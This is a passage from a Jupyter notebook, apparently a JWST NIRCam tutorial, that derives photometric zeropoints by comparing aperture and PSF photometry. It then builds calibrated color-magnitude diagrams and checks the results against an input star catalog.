"df_f115w = matches_f115w.to_pandas()\ndf_f200w = matches_f200w.to_pandas()\n\ndf_f115w['RA_' + filt1] = df_f115w[['radec_1.ra', 'radec_2.ra', 'radec_3.ra', 'radec_4.ra']].mean(axis=1)\ndf_f115w['e_RA_' + filt1] = df_f115w[['radec_1.ra', 'radec_2.ra', 'radec_3.ra', 'radec_4.ra']].std(axis=1)\ndf_f115w['Dec_' + filt1] = df_f115w[['radec_1.dec', 'radec_2.dec', 'radec_3.dec', 'radec_4.dec']].mean(axis=1)\ndf_f115w['e_Dec_' + filt1] = df_f115w[['radec_1.dec', 'radec_2.dec', 'radec_3.dec', 'radec_4.dec']].std(axis=1)\ndf_f115w[filt1 + '_inst'] = df_f115w[['mag_1', 'mag_2', 'mag_3', 'mag_4']].mean(axis=1)\ndf_f115w['e' + filt1 + '_inst'] = df_f115w[['mag_1', 'mag_2', 'mag_3', 'mag_4']].std(axis=1)\n\ndf_f200w['RA_' + filt2] = df_f200w[['radec_1.ra', 'radec_2.ra', 'radec_3.ra', 'radec_4.ra']].mean(axis=1)\ndf_f200w['e_RA_' + filt2] = df_f200w[['radec_1.ra', 'radec_2.ra', 'radec_3.ra', 'radec_4.ra']].std(axis=1)\ndf_f200w['Dec_' + filt2] = df_f200w[['radec_1.dec', 'radec_2.dec', 'radec_3.dec', 'radec_4.dec']].mean(axis=1)\ndf_f200w['e_Dec_' + filt2] = df_f200w[['radec_1.dec', 'radec_2.dec', 'radec_3.dec', 'radec_4.dec']].std(axis=1)\ndf_f200w[filt2 + '_inst'] = df_f200w[['mag_1', 'mag_2', 'mag_3', 'mag_4']].mean(axis=1)\ndf_f200w['e' + filt2 + '_inst'] = df_f200w[['mag_1', 'mag_2', 'mag_3', 'mag_4']].std(axis=1)",
"_____no_output_____"
]
],
[
[
"## Final Color-Magnitude Diagram (Instrumental Magnitudes)",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(12, 14))\nplt.clf()\n\nax1 = plt.subplot(1, 2, 1)\n\nax1.set_xlabel(filt1 + '_inst -' + filt2 + '_inst', fontdict=font2)\nax1.set_ylabel(filt1 + '_inst', fontdict=font2)\n\nxlim0 = -0.5\nxlim1 = 0.8\nylim0 = -1.5\nylim1 = -9\n\nax1.set_xlim(xlim0, xlim1)\nax1.set_ylim(ylim0, ylim1)\n\nax1.xaxis.set_major_locator(ticker.AutoLocator())\nax1.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax1.yaxis.set_major_locator(ticker.AutoLocator())\nax1.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nradec_f115w_inst = SkyCoord(df_f115w['RA_' + filt1], df_f115w['Dec_' + filt1], unit='deg')\nradec_f200w_inst = SkyCoord(df_f200w['RA_' + filt2], df_f200w['Dec_' + filt2], unit='deg')\n\nidx_inst, d2d_inst, _ = match_coordinates_sky(radec_f115w_inst, radec_f200w_inst)\n\nsep_constraint_inst = d2d_inst < max_sep\n\nf115w_inst = np.array(df_f115w[filt1 + '_inst'][sep_constraint_inst])\nef115w_inst = np.array(df_f115w['e' + filt1 + '_inst'][sep_constraint_inst])\nradec_f115w = radec_f115w_inst[sep_constraint_inst]\n\nf200w_inst = np.array(df_f200w[filt2 + '_inst'][idx_inst[sep_constraint_inst]])\nef200w_inst = np.array(df_f200w['e' + filt2 + '_inst'][idx_inst[sep_constraint_inst]])\nradec_f200w = radec_f200w_inst[idx_inst[sep_constraint_inst]]\n\nax1.scatter(f115w_inst - f200w_inst, f115w_inst, s=1, color='k')\n\nax2 = plt.subplot(2, 2, 2)\n\nax2.set_xlabel(filt1 + '_inst', fontdict=font2)\nax2.set_ylabel('$\\sigma$' + filt1, fontdict=font2)\n\nxlim0 = -9\nxlim1 = -1.5\nylim0 = -0.01 \nylim1 = 1\n\nax2.set_xlim(xlim0, xlim1)\nax2.set_ylim(ylim0, ylim1)\n\nax2.xaxis.set_major_locator(ticker.AutoLocator())\nax2.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax2.yaxis.set_major_locator(ticker.AutoLocator())\nax2.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax2.scatter(df_f115w[filt1 + '_inst'], df_f115w['e' + filt1 + '_inst'], s=1, color='k')\n\nax3 = plt.subplot(2, 2, 4)\n\nax3.set_xlabel(filt2 + '_inst', fontdict=font2)\nax3.set_ylabel('$\\sigma$' + filt2, fontdict=font2)\n\nax3.set_xlim(xlim0, xlim1)\nax3.set_ylim(ylim0, ylim1)\n\nax3.xaxis.set_major_locator(ticker.AutoLocator())\nax3.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax3.yaxis.set_major_locator(ticker.AutoLocator())\nax3.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax3.scatter(df_f200w[filt2 + '_inst'], df_f200w['e' + filt2 + '_inst'], s=1, color='k')\n\nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"## Photometric Zeropoints\n\nTo obtain the final calibrated color-magnitude diagram, we need to calculate the photometric zeropoints. Hence we need to perform aperture photometry on the calibrated images (Level-3), apply the appropriate aperture correction for the finite aperture adopted (the values provided in the dictionary above are for an infinite aperture) and then compare it with the PSF photometry. Hence, we can summarize the steps as follows:\n\n* perform aperture photometry \n* apply appropriate aperture correction\n* apply tabulated zeropoint\n* cross-match with psf photometry",
"_____no_output_____"
],
[
"## Load the calibrated and rectified images (Level 3 imaging pipeline)",
"_____no_output_____"
]
],
[
[
"dict_images_combined = {'NRCA1': {}, 'NRCA2': {}, 'NRCA3': {}, 'NRCA4': {}, 'NRCA5': {},\n 'NRCB1': {}, 'NRCB2': {}, 'NRCB3': {}, 'NRCB4': {}, 'NRCB5': {}}\n\ndict_filter_short = {}\ndict_filter_long = {}\n\nff_short = []\ndet_short = []\ndet_long = []\nff_long = []\ndetlist_short = []\ndetlist_long = []\nfiltlist_short = []\nfiltlist_long = []\n\nif not glob.glob('./*combined*fits'):\n\n print(\"Downloading images\")\n\n boxlink_images_lev3 = 'https://data.science.stsci.edu/redirect/JWST/jwst-data_analysis_tools/stellar_photometry/images_level3.tar.gz'\n boxfile_images_lev3 = './images_level3.tar.gz'\n urllib.request.urlretrieve(boxlink_images_lev3, boxfile_images_lev3)\n\n tar = tarfile.open(boxfile_images_lev3, 'r')\n tar.extractall()\n\n images_dir = './'\n files_singles = sorted(glob.glob(os.path.join(images_dir, \"*combined*fits\")))\n\nelse:\n\n images_dir = './'\n files_singles = sorted(glob.glob(os.path.join(images_dir, \"*combined*fits\")))\n\nfor file in files_singles:\n\n im = fits.open(file)\n f = im[0].header['FILTER']\n d = im[0].header['DETECTOR']\n\n if d == 'NRCBLONG':\n d = 'NRCB5'\n elif d == 'NRCALONG':\n d = 'NRCA5'\n else:\n d = d\n\n wv = np.float(f[1:3])\n\n if wv > 24:\n ff_long.append(f)\n det_long.append(d)\n\n else:\n ff_short.append(f)\n det_short.append(d)\n\n detlist_short = sorted(list(dict.fromkeys(det_short)))\n detlist_long = sorted(list(dict.fromkeys(det_long)))\n\n unique_list_filters_short = []\n unique_list_filters_long = []\n\n for x in ff_short:\n\n if x not in unique_list_filters_short:\n\n dict_filter_short.setdefault(x, {})\n\n for x in ff_long:\n if x not in unique_list_filters_long:\n dict_filter_long.setdefault(x, {})\n\n for d_s in detlist_short:\n dict_images_combined[d_s] = dict_filter_short\n\n for d_l in detlist_long:\n dict_images_combined[d_l] = dict_filter_long\n\n filtlist_short = sorted(list(dict.fromkeys(dict_filter_short)))\n filtlist_long = sorted(list(dict.fromkeys(dict_filter_long)))\n\n if len(dict_images_combined[d][f]) == 0:\n dict_images_combined[d][f] = {'images': [file]}\n else:\n dict_images_combined[d][f]['images'].append(file)\n\nprint(\"Available Detectors for SW channel:\", detlist_short)\nprint(\"Available Detectors for LW channel:\", detlist_long)\nprint(\"Available SW Filters:\", filtlist_short)\nprint(\"Available LW Filters:\", filtlist_long)",
"_____no_output_____"
]
],
[
[
"## Display the images",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(14, 14))\n\nfor det in dets_short:\n for i, filt in enumerate(filts_short):\n\n image = fits.open(dict_images_combined[det][filt]['images'][0])\n data_sb = image[1].data\n\n ax = plt.subplot(1, len(filts_short), i + 1)\n\n norm = simple_norm(data_sb, 'sqrt', percent=99.)\n plt.xlabel(\"X [px]\", fontdict=font2)\n plt.ylabel(\"Y [px]\", fontdict=font2)\n plt.title(filt, fontdict=font2)\n\n ax.imshow(data_sb, norm=norm, cmap='Greys')\nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"## Aperture Photometry",
"_____no_output_____"
],
[
"As we have done previously, we create a dictionary that contains the tables with the derived aperture photometry for each image.",
"_____no_output_____"
]
],
[
[
"dict_aper = {}\n\nfor det in dets_short:\n\n dict_aper.setdefault(det, {})\n for j, filt in enumerate(filts_short):\n\n dict_aper[det].setdefault(filt, {})\n\n dict_aper[det][filt]['stars for ap phot'] = None\n dict_aper[det][filt]['stars for ap phot matched'] = None\n dict_aper[det][filt]['aperture phot table'] = None",
"_____no_output_____"
]
],
[
[
"### Find bright isolated stars",
"_____no_output_____"
]
],
[
[
"def find_bright_stars(det='NRCA1', filt='F070W', dist_sel=False):\n\n bkgrms = MADStdBackgroundRMS()\n mmm_bkg = MMMBackground()\n\n image = fits.open(dict_images_combined[det][filt]['images'][i])\n data_sb = image[1].data\n imh = image[1].header\n\n print(\"Selecting stars for aperture photometry on image {number} of filter {f}, detector {d}\".format(number=i + 1, f=filt, d=det))\n\n data = data_sb / imh['PHOTMJSR']\n print(\"Conversion factor from {units} to DN/s for filter {f}:\".format(units=imh['BUNIT'], f=filt), imh['PHOTMJSR'])\n\n sigma_psf = dict_utils[filt]['psf fwhm']\n\n print(\"FWHM for the filter {f}:\".format(f=filt), sigma_psf, \"px\")\n\n std = bkgrms(data)\n bkg = mmm_bkg(data)\n daofind = DAOStarFinder(threshold=th[j] * std + bkg, fwhm=sigma_psf, roundhi=1.0, roundlo=-1.0,\n sharplo=0.30, sharphi=1.40)\n\n apcorr_stars = daofind(data)\n dict_aper[det][filt]['stars for ap phot'] = apcorr_stars\n \n if dist_sel:\n\n print(\"\")\n print(\"Calculating closest neigbhour distance\")\n\n d = []\n\n daofind_tot = DAOStarFinder(threshold=10 * std + bkg, fwhm=sigma_psf, roundhi=1.0, roundlo=-1.0,\n sharplo=0.30, sharphi=1.40)\n\n stars_tot = daofind_tot(data)\n\n x_tot = stars_tot['xcentroid']\n y_tot = stars_tot['ycentroid']\n\n for xx, yy in zip(apcorr_stars['xcentroid'], apcorr_stars['ycentroid']):\n\n sep = []\n dist = np.sqrt((x_tot - xx)**2 + (y_tot - yy)**2)\n sep = np.sort(dist)[1:2][0]\n d.append(sep)\n\n apcorr_stars['min distance'] = d\n mask_dist = (apcorr_stars['min distance'] > min_sep[j])\n\n apcorr_stars = apcorr_stars[mask_dist]\n\n dict_aper[det][filt]['stars for ap phot'] = apcorr_stars\n\n print(\"Minimum distance required:\", min_sep[j], \"px\")\n print(\"\")\n print(\"Number of bright isolated sources found in the image for {f}:\".format(f=filt), len(apcorr_stars))\n print(\"-----------------------------------------------------\")\n print(\"\")\n else:\n print(\"\")\n print(\"Number of bright sources found in the image for {f}:\".format(f=filt), len(apcorr_stars))\n print(\"--------------------------------------------\")\n print(\"\") \n \n return",
"_____no_output_____"
],
[
"tic = time.perf_counter()\n\nth = [700, 500] # threshold level for the two filters (length must match number of filters analyzed)\nmin_sep = [10, 10] # minimum separation acceptable for zp stars from closest neighbour\n\n\nfor det in dets_short:\n for j, filt in enumerate(filts_short):\n for i in np.arange(0, len(dict_images_combined[det][filt]['images']), 1):\n\n find_bright_stars(det=det, filt=filt, dist_sel=False)\n\ntoc = time.perf_counter()\n\nprint(\"Elapsed Time for finding stars for Aperture Photometry:\", toc - tic) ",
"_____no_output_____"
]
],
[
[
"As a further way to obtain a good quality sample, we cross-match the catalogs from the two filters and retain only the stars in common",
"_____no_output_____"
]
],
[
[
"for det in dets_short:\n for j, filt in enumerate(filts_short):\n for i in np.arange(0, len(dict_images_combined[det][filt]['images']), 1):\n\n image = ImageModel(dict_images_combined[det][filt]['images'][i])\n\n ra, dec = image.meta.wcs(dict_aper[det][filt]['stars for ap phot']['xcentroid'],\n dict_aper[det][filt]['stars for ap phot']['ycentroid'])\n \n radec = SkyCoord(ra, dec, unit='deg')\n dict_aper[det][filt]['stars for ap phot']['radec'] = radec",
"_____no_output_____"
],
[
"idx_ap, d2d_ap, _ = match_coordinates_sky(dict_aper[det][filt1]['stars for ap phot']['radec'],\n dict_aper[det][filt2]['stars for ap phot']['radec'])\n\nsep_constraint_ap = d2d_ap < max_sep\n\nmatched_apcorr_f115w = Table()\nmatched_apcorr_f200w = Table()\n\nmatched_apcorr_f115w = dict_aper[det][filt1]['stars for ap phot'][sep_constraint_ap]\nmatched_apcorr_f200w = dict_aper[det][filt2]['stars for ap phot'][idx_ap[sep_constraint_ap]]\n\ndict_aper[det][filt1]['stars for ap phot matched'] = matched_apcorr_f115w\ndict_aper[det][filt2]['stars for ap phot matched'] = matched_apcorr_f200w",
"_____no_output_____"
]
],
[
[
"### Load aperture correction table\n\n**Note**: these values are obtained from the study of the synthetic WebbPSF PSFs. They will be updated once we have in-flight measures.",
"_____no_output_____"
]
],
[
[
"if os.path.isfile('./aperture_correction_table.txt'):\n ap_tab = './aperture_correction_table.txt'\nelse:\n print(\"Downloading the aperture correction table\")\n\n boxlink_apcorr_table = 'https://data.science.stsci.edu/redirect/JWST/jwst-data_analysis_tools/stellar_photometry/aperture_correction_table.txt'\n boxfile_apcorr_table = './aperture_correction_table.txt'\n urllib.request.urlretrieve(boxlink_apcorr_table, boxfile_apcorr_table)\n ap_tab = './aperture_correction_table.txt'\n\naper_table = pd.read_csv(ap_tab, header=None, sep='\\s+', index_col=0,\n names=['filter', 'pupil', 'wave', 'r10', 'r20', 'r30', 'r40', 'r50', 'r60', 'r70', 'r80',\n 'r85', 'r90', 'sky_flux_px', 'apcorr10', 'apcorr20', 'apcorr30', 'apcorr40',\n 'apcorr50', 'apcorr60', 'apcorr70', 'apcorr80', 'apcorr85', 'apcorr90', 'sky_in',\n 'sky_out'], comment='#', skiprows=0, usecols=range(0, 26))\naper_table.head()",
"_____no_output_____"
]
],
[
[
"### Perform Aperture Photometry",
"_____no_output_____"
]
],
[
[
"def aperture_phot(det=det, filt='F070W'):\n\n radii = [aper_table.loc[filt]['r70']]\n\n ees = '70'.split()\n ee_radii = dict(zip(ees, radii))\n\n positions = np.transpose((dict_aper[det][filt]['stars for ap phot matched']['xcentroid'],\n dict_aper[det][filt]['stars for ap phot matched']['ycentroid']))\n\n image = fits.open(dict_images_combined[det][filt]['images'][0])\n data_sb = image[1].data\n imh = image[1].header\n data = data_sb / imh['PHOTMJSR']\n\n # sky from the aperture correction table:\n\n sky = {\"sky_in\": aper_table.loc[filt]['r80'], \"sky_out\": aper_table.loc[filt]['r85']}\n\n tic = time.perf_counter()\n\n table_aper = Table()\n\n for ee, radius in ee_radii.items():\n print(\"Performing aperture photometry for radius equivalent to EE = {0}% for filter {1}\".format(ee, filt))\n aperture = CircularAperture(positions, r=radius)\n annulus_aperture = CircularAnnulus(positions, r_in=sky[\"sky_in\"], r_out=sky[\"sky_out\"])\n annulus_mask = annulus_aperture.to_mask(method='center')\n\n bkg_median = []\n for mask in annulus_mask:\n annulus_data = mask.multiply(data)\n annulus_data_1d = annulus_data[mask.data > 0]\n _, median_sigclip, _ = sigma_clipped_stats(annulus_data_1d)\n bkg_median.append(median_sigclip)\n bkg_median = np.array(bkg_median)\n\n phot = aperture_photometry(data, aperture, method='exact')\n phot['annulus_median'] = bkg_median\n phot['aper_bkg'] = bkg_median * aperture.area\n phot['aper_sum_bkgsub'] = phot['aperture_sum'] - phot['aper_bkg']\n\n apcorr = [aper_table.loc[filt]['apcorr70']]\n\n phot['aper_sum_corrected'] = phot['aper_sum_bkgsub'] * apcorr\n\n phot['mag_corrected'] = -2.5 * np.log10(phot['aper_sum_corrected']) + dict_utils[filt]['VegaMAG zp modB']\n\n table_aper.add_column(phot['aperture_sum'], name='aper_sum_' + ee)\n table_aper.add_column(phot['annulus_median'], name='annulus_median_' + ee)\n table_aper.add_column(phot['aper_bkg'], name='aper_bkg_ee_' + ee)\n table_aper.add_column(phot['aper_sum_bkgsub'], name='aper_sum_bkgsub_' + ee)\n table_aper.add_column(phot['aper_sum_corrected'], name='aper_sum_corrected_' + filt) \n table_aper.add_column(phot['mag_corrected'], name='mag_corrected_' + filt)\n\n dict_aper[det][filt]['aperture phot table'] = table_aper\n\n toc = time.perf_counter()\n print(\"Time Elapsed:\", toc - tic)\n\n return",
"_____no_output_____"
],
[
"aperture_phot(det=det, filt=filt1)\naperture_phot(det=det, filt=filt2)",
"_____no_output_____"
]
],
[
[
"### Derive Zeropoints",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(14, 8))\nplt.clf()\n\nax1 = plt.subplot(2, 1, 1)\n\nax1.set_xlabel(filt1, fontdict=font2)\nax1.set_ylabel('Zeropoint', fontdict=font2)\n\nidx_zp_1, d2d_zp_1, _ = match_coordinates_sky(dict_aper[det][filt1]['stars for ap phot matched']['radec'], radec_f115w_inst)\n\nsep_constraint_zp_1 = d2d_zp_1 < max_sep\n\nf115w_ap_matched = np.array(dict_aper[det][filt1]['aperture phot table']['mag_corrected_' + filt1][sep_constraint_zp_1])\nf115w_psf_matched = np.array(df_f115w[filt1 + '_inst'][idx_zp_1[sep_constraint_zp_1]])\n\ndiff_f115w = f115w_ap_matched - f115w_psf_matched\n_, zp_f115w, zp_sigma_f115w = sigma_clipped_stats(diff_f115w)\n\nxlim0 = -9\nxlim1 = -5\nylim0 = np.mean(diff_f115w) - 0.5\nylim1 = np.mean(diff_f115w) + 0.5\n\nax1.set_xlim(xlim0, xlim1)\nax1.set_ylim(ylim0, ylim1)\n\nax1.xaxis.set_major_locator(ticker.AutoLocator())\nax1.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax1.yaxis.set_major_locator(ticker.AutoLocator())\nax1.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax1.scatter(f115w_psf_matched, diff_f115w, s=50, color='k')\nax1.plot([xlim0, xlim1], [zp_f115w, zp_f115w], color='r', lw=5, ls='--')\nax1.text(xlim0 + 0.05, ylim1 - 0.15, filt1 + ' Zeropoint = %5.3f $\\pm$ %5.3f' % (zp_f115w, zp_sigma_f115w), color='k', fontdict=font2)\n \nax2 = plt.subplot(2, 1, 2)\n\nax2.set_xlabel(filt2, fontdict=font2)\nax2.set_ylabel('Zeropoint', fontdict=font2)\n\nidx_zp_2, d2d_zp_2, _ = match_coordinates_sky(dict_aper[det][filt2]['stars for ap phot matched']['radec'], radec_f200w_inst)\n\nsep_constraint_zp_2 = d2d_zp_2 < max_sep\n\nf200w_ap_matched = np.array(dict_aper[det][filt2]['aperture phot table']['mag_corrected_' + filt2][sep_constraint_zp_2])\nf200w_psf_matched = np.array(df_f200w[filt2 + '_inst'][idx_zp_2[sep_constraint_zp_2]])\n\ndiff_f200w = f200w_ap_matched - f200w_psf_matched\n_, zp_f200w, zp_sigma_f200w = sigma_clipped_stats(diff_f200w)\n\nxlim0 = -9\nxlim1 = -5\nylim0 = np.mean(diff_f200w) - 0.5\nylim1 = np.mean(diff_f200w) + 0.5\n\nax2.set_xlim(xlim0, xlim1)\nax2.set_ylim(ylim0, ylim1)\n\nax2.xaxis.set_major_locator(ticker.AutoLocator())\nax2.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax2.yaxis.set_major_locator(ticker.AutoLocator())\nax2.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax2.scatter(f200w_psf_matched, diff_f200w, s=50, color='k')\nax2.plot([xlim0, xlim1], [zp_f200w, zp_f200w], color='r', lw=5, ls='--')\nax2.text(xlim0 + 0.05, ylim1 - 0.15, filt2 + ' Zeropoint = %5.3f $\\pm$ %5.3f' % (zp_f200w, zp_sigma_f200w), color='k', fontdict=font2)\n \nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"## Import input photometry",
"_____no_output_____"
]
],
[
[
"if os.path.isfile('./pointsource.cat'):\n input_cat = './pointsource.cat'\n\nelse:\n \n print(\"Downloading input pointsource catalog\")\n\n boxlink_input_cat = 'https://data.science.stsci.edu/redirect/JWST/jwst-data_analysis_tools/stellar_photometry/pointsource.cat'\n boxfile_input_cat = './pointsource.cat'\n urllib.request.urlretrieve(boxlink_input_cat, boxfile_input_cat)\n input_cat = './pointsource.cat'\n\ncat = pd.read_csv(input_cat, header=None, sep='\\s+', names=['ra_in', 'dec_in', 'f070w_in', 'f115w_in',\n 'f200w_in', 'f277w_in', 'f356w_in', 'f444w_in'],\n comment='#', skiprows=7, usecols=range(0, 8))\n\ncat.head()",
"_____no_output_____"
]
],
[
[
"Extract from the input catalog the stars in the same region as the one analyzed",
"_____no_output_____"
]
],
[
[
"lim_ra_min = np.min(radec_f115w.ra)\nlim_ra_max = np.max(radec_f115w.ra)\nlim_dec_min = np.min(radec_f115w.dec)\nlim_dec_max = np.max(radec_f115w.dec)\n\ncat_sel = cat[(cat['ra_in'] > lim_ra_min) & (cat['ra_in'] < lim_ra_max) & (cat['dec_in'] > lim_dec_min)\n & (cat['dec_in'] < lim_dec_max)]",
"_____no_output_____"
]
],
[
[
"## Calibrated Color-Magnitude Diagram",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(12, 14))\nplt.clf()\n\nax1 = plt.subplot(1, 2, 1)\n\nmag1_in = np.array(cat_sel['f115w_in'])\nmag2_in = np.array(cat_sel['f200w_in'])\ndiff_in = mag1_in - mag2_in\n\nxlim0 = -0.25\nxlim1 = 1.75\nylim0 = 25\nylim1 = 15 \nax1.set_xlim(xlim0, xlim1)\nax1.set_ylim(ylim0, ylim1)\n\nax1.xaxis.set_major_locator(ticker.AutoLocator())\nax1.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax1.yaxis.set_major_locator(ticker.AutoLocator())\nax1.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax1.scatter(mag1_in - mag2_in, mag1_in, s=1, color='k')\n\nax1.set_xlabel(filt1 + ' - ' + filt2, fontdict=font2)\nax1.set_ylabel(filt1, fontdict=font2)\nax1.text(xlim0 + 0.15, 15.5, \"Input\", fontdict=font2)\n\nax2 = plt.subplot(1, 2, 2)\n\nax2.set_xlim(xlim0, xlim1)\nax2.set_ylim(ylim0, ylim1)\n\nax2.xaxis.set_major_locator(ticker.AutoLocator())\nax2.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax2.yaxis.set_major_locator(ticker.AutoLocator())\nax2.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nf115w = f115w_inst + zp_f115w \nf200w = f200w_inst + zp_f200w\n\nmaglim = np.arange(18, 25, 1)\nmags = []\nerrs_mag = []\nerrs_col = []\n\nfor i in np.arange(0, len(maglim) - 1, 1):\n\n mag = (maglim[i] + maglim[i + 1]) / 2\n err_mag1 = ef115w_inst[(f115w > maglim[i]) & (f115w < maglim[i + 1])]\n err_mag2 = ef200w_inst[(f115w > maglim[i]) & (f115w < maglim[i + 1])]\n err_mag = np.mean(err_mag1[i])\n err_temp = np.sqrt(err_mag1**2 + err_mag2**2)\n err_col = np.mean(err_temp[i])\n\n errs_mag.append(err_mag) \n errs_col.append(err_col)\n mags.append(mag)\n\ncol = [0] * (len(maglim) - 1)\n\nax2.errorbar(col, mags, yerr=errs_mag, xerr=errs_col, fmt='o', color='k')\n \nax2.scatter(f115w - f200w, f115w, s=1, color='k')\nax2.text(xlim0 + 0.15, 15.5, \"Output\", fontdict=font2)\n\nax2.set_xlabel(filt1 + ' - ' + filt2, fontdict=font2)\nax2.set_ylabel(filt1, fontdict=font2)\n\nplt.tight_layout()",
"_____no_output_____"
]
],
[
[
"## Comparison between input and output photometry ",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize=(14, 8))\nplt.clf()\n\nax1 = plt.subplot(2, 1, 1)\n\nax1.set_xlabel(filt1, fontdict=font2)\nax1.set_ylabel('$\\Delta$ Mag', fontdict=font2)\n\nradec_input = SkyCoord(cat_sel['ra_in'], cat_sel['dec_in'], unit='deg')\n\nidx_f115w_cfr, d2d_f115w_cfr, _ = match_coordinates_sky(radec_input, radec_f115w)\n\nsep_f115w_cfr = d2d_f115w_cfr < max_sep\n\nf115w_inp_cfr = np.array(cat_sel['f115w_in'][sep_f115w_cfr])\nf115w_psf_cfr = np.array(f115w[idx_f115w_cfr[sep_f115w_cfr]])\n\ndiff_f115w_cfr = f115w_inp_cfr - f115w_psf_cfr\n_, med_diff_f115w_cfr, sig_diff_f115w_cfr = sigma_clipped_stats(diff_f115w_cfr)\n\nxlim0 = 16\nxlim1 = 24.5\nylim0 = np.mean(diff_f115w_cfr) - 0.5\nylim1 = np.mean(diff_f115w_cfr) + 0.5\n\nax1.set_xlim(xlim0, xlim1)\nax1.set_ylim(ylim0, ylim1)\n\nax1.xaxis.set_major_locator(ticker.AutoLocator())\nax1.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax1.yaxis.set_major_locator(ticker.AutoLocator())\nax1.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax1.scatter(f115w_psf_cfr, diff_f115w_cfr, s=5, color='k')\nax1.plot([xlim0, xlim1], [0, 0], color='r', lw=5, ls='--')\nax1.text(xlim0 + 0.05, ylim1 - 0.15, filt1 + ' $\\Delta$ Mag = %5.3f $\\pm$ %5.3f'\n % (med_diff_f115w_cfr, sig_diff_f115w_cfr), color='k', fontdict=font2)\n\nax2 = plt.subplot(2, 1, 2)\n\nax2.set_xlabel(filt2, fontdict=font2)\nax2.set_ylabel('$\\Delta$ Mag', fontdict=font2)\n\nidx_f200w_cfr, d2d_f200w_cfr, _ = match_coordinates_sky(radec_input, radec_f200w)\n\nsep_f200w_cfr = d2d_f200w_cfr < max_sep\n\nf200w_inp_cfr = np.array(cat_sel['f200w_in'][sep_f200w_cfr])\nf200w_psf_cfr = np.array(f200w[idx_f200w_cfr[sep_f200w_cfr]])\n\ndiff_f200w_cfr = f200w_inp_cfr - f200w_psf_cfr\n_, med_diff_f200w_cfr, sig_diff_f200w_cfr = sigma_clipped_stats(diff_f200w_cfr)\n\nxlim0 = 16\nxlim1 = 24\nylim0 = np.mean(diff_f200w_cfr) - 0.5 \nylim1 = np.mean(diff_f200w_cfr) + 0.5\n\nax2.set_xlim(xlim0, xlim1)\nax2.set_ylim(ylim0, ylim1)\n\nax2.xaxis.set_major_locator(ticker.AutoLocator())\nax2.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax2.yaxis.set_major_locator(ticker.AutoLocator())\nax2.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax2.scatter(f200w_psf_cfr, diff_f200w_cfr, s=5, color='k')\nax2.plot([xlim0, xlim1], [0, 0], color='r', lw=5, ls='--')\nax2.text(xlim0 + 0.05, ylim1 - 0.15, filt2 + ' $\\Delta$ Mag = %5.3f $\\pm$ %5.3f'\n % (med_diff_f200w_cfr, sig_diff_f200w_cfr), color='k', fontdict=font2)\n\nplt.tight_layout()",
"_____no_output_____"
],
[
"plt.figure(figsize=(12, 6))\n\nax1 = plt.subplot(1, 2, 1)\n\nxlim0 = -10\nxlim1 = 10\nylim0 = -10\nylim1 = 10\n\nax1.set_xlim(xlim0, xlim1)\nax1.set_ylim(ylim0, ylim1)\n\nax1.xaxis.set_major_locator(ticker.AutoLocator())\nax1.xaxis.set_minor_locator(ticker.AutoMinorLocator())\nax1.yaxis.set_major_locator(ticker.AutoLocator())\nax1.yaxis.set_minor_locator(ticker.AutoMinorLocator())\n\nax1.set_xlabel('$\\Delta$ RA (mas)', fontdict=font2)\nax1.set_ylabel('$\\Delta$ Dec (mas)', fontdict=font2)\nax1.set_title(filt1, fontdict=font2)\n\nra_f115w_inp_cfr = np.array(cat_sel['ra_in'][sep_f115w_cfr])\nra_f115w_psf_cfr = np.array(radec_f115w.ra[idx_f115w_cfr[sep_f115w_cfr]])\n\ndec_f115w_inp_cfr = np.array(cat_sel['dec_in'][sep_f115w_cfr])\ndec_f115w_psf_cfr = np.array(radec_f115w.dec[idx_f115w_cfr[sep_f115w_cfr]])\n\ndec_rad_f115w = np.radians(dec_f115w_psf_cfr)\n\ndiffra_f115w_cfr = ((((ra_f115w_inp_cfr - ra_f115w_psf_cfr) * np.cos(dec_rad_f115w)) * u.deg).to(u.mas) / (1 * u.mas))\n\n_, med_diffra_f115w_cfr, sig_diffra_f115w_cfr = sigma_clipped_stats(diffra_f115w_cfr)\n\ndiffdec_f115w_cfr = (((dec_f115w_inp_cfr - dec_f115w_psf_cfr) * u.deg).to(u.mas) / (1 * u.mas))\n\n_, med_diffdec_f115w_cfr, sig_diffdec_f115w_cfr = sigma_clipped_stats(diffdec_f115w_cfr)\n\nax1.scatter(diffra_f115w_cfr, diffdec_f115w_cfr, s=1, color='k')\nax1.plot([0, 0], [ylim0, ylim1], color='k', lw=2, ls='--')\nax1.plot([xlim0, xlim1], [0, 0], color='k', lw=2, ls='--')\n\nax1.text(xlim0 + 0.05, ylim1 - 1.50, ' $\\Delta$ RA (mas) = %5.3f $\\pm$ %5.3f'\n % (med_diffra_f115w_cfr, sig_diffra_f115w_cfr), color='k', fontdict=font2)\nax1.text(xlim0 + 0.05, ylim1 - 3.0, ' $\\Delta$ Dec (mas) = %5.3f $\\pm$ %5.3f'\n % (med_diffdec_f115w_cfr, sig_diffdec_f115w_cfr), color='k', fontdict=font2)\n\nax2 = plt.subplot(1, 2, 2)\n\nxlim0 = -10\nxlim1 = 10\nylim0 = -10\nylim1 = 10\n\nax2.set_xlim(xlim0, 